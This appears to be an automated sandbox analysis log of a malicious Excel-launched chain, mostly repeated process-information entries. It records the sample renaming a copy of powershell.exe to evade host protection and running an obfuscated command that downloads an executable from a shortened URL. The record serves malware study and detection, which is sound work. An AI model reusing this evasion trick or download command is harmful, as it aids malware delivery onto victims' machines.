Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Robocopy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Renames powershell.exe to bypass HIPS

Show sources

Source: C:\Windows\System32\Robocopy.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\Robocopy.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\o.exe	File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\o.exe	File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 3040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 2480	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 3040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 2480	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8A3C4 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8A3C4 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\

Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C7C8 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB81158 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C660 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C7C8 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB81158 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C660 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\o.exe	Memory allocated: page read and write \| page guard
Source: C:\Users\user\AppData\Local\Temp\o.exe	Memory allocated: page read and write \| page guard

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
